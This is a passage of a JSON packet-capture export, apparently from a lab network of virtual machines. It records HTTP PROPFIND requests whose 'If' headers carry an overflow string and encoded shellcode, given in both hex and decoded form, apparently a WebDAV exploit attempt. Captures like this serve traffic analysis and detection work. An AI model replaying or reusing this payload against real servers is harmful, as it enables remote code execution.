"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "38513",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "38513",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "73",
|
||
"tcp.len": "209",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "1938335238",
|
||
"tcp.nxtseq": "1658",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3577042242",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00004f5a",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:8a:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:8a:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868682",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000434000",
|
||
"tcp.analysis.bytes_in_flight": "1657",
|
||
"tcp.analysis.push_bytes_sent": "1657"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000794000",
|
||
"tcp.time_delta": "0.000073000"
|
||
},
|
||
"tcp.payload": "31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "507",
|
||
"tcp.segment": "508",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1657",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:55:43:7a:70:56:65:4b:55:45:63:72:45:78:6d:52:68:6f:42:56:71:48:58:6e:62:45:77:47:44:4c:59:6a:76:79:78:68:41:59:74:65:59:6e:74:50:52:76:58:47:4e:74:62:57:71:6b:68:7a:69:64:65:46:71:78:51:61:6a:6e:55:70:72:61:77:6c:49:69:e4:89:97:e6:85:a6:e7:99:a3:e5:95:a6:e5:95:81:e7:9d:90:e5:a1:99:e4:8d:a4:e6:9d:b4:e5:91:93:e4:91:ab:e4:b1:b2:e7:a1:ae:e5:a1:97:e4:95:b4:e4:b1:a3:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:8d:96:e6:85:a9:e6:a5:ac:e5:81:99:e5:85:89:e6:a9:99:e7:8d:ba:e6:8d:a8:e4:9d:8d:e4:99:8e:e5:a9:a9:e6:bd:a8:e4:bd:ab:e5:95:91:e4:91:8e:e6:85:83:e4:8d:90:e5:a1:83:e5:89:95:e7:a9:90:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:51:75:77:44:64:45:59:50:45:64:74:63:72:75:44:59:51:68:71:49:74:4c:41:76:73:4a:47:73:45:4a:4f:65:4f:6a:5a:54:43:4f:75:73:56:6c:41:6a:48:53:46:64:7a:62:73:52:48:68:44:6a:4b:47:59:64:65:50:57:7a:6d:6d:62:4d:4b:4d:63:68:4b:e6:b1:8d:e7:89:a6:e7:8d:ac:e6:95:a3:e4:99:ac:e6:8d:ac:e5:91:87:e6:b9:8c:e7:a5:b5:e5:a9:b0:e7:9d:87:e7:99:85:e4:99:8b:e5:81:89:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:89:90:e6:a5:ae:e5:9d:9a:e5:81:86:e1:8f:80:e6:a0:83:e4:8d:8b:e6:95:ae:e6:99:a5:e6:a1:af:e5:85:82:e6:8d:a7:e6:91:96:e6:b9:96:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/UCzpVeKUEcrExmRhoBVqHXnbEwGDLYjvyxhAYteYntPRvXGNtbWqkhzideFqxQajnUprawlIi<49><69><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/QuwDdEYPEdtcruDYQhqItLAvsJGsEJOeOjZTCOusVlAjHSFdzbsRHhDjKGYdePWzmmbMKMchK<68><4B><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "510"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.877290000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.877290000",
|
||
"frame.time_delta": "0.000005000",
|
||
"frame.time_delta_displayed": "0.003004000",
|
||
"frame.time_relative": "17.128230000",
|
||
"frame.number": "517",
|
||
"frame.len": "273",
|
||
"frame.cap_len": "273",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "259",
|
||
"ip.id": "0x000014db",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00001bb3",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "44215",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "44215",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "74",
|
||
"tcp.len": "207",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3116104418",
|
||
"tcp.nxtseq": "1656",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2349977512",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00009e26",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:8d:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:8d:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868685",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000247000",
|
||
"tcp.analysis.bytes_in_flight": "1655",
|
||
"tcp.analysis.push_bytes_sent": "1655"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000507000",
|
||
"tcp.time_delta": "0.000005000"
|
||
},
|
||
"tcp.payload": "68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "516",
|
||
"tcp.segment": "517",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1655",
|
||
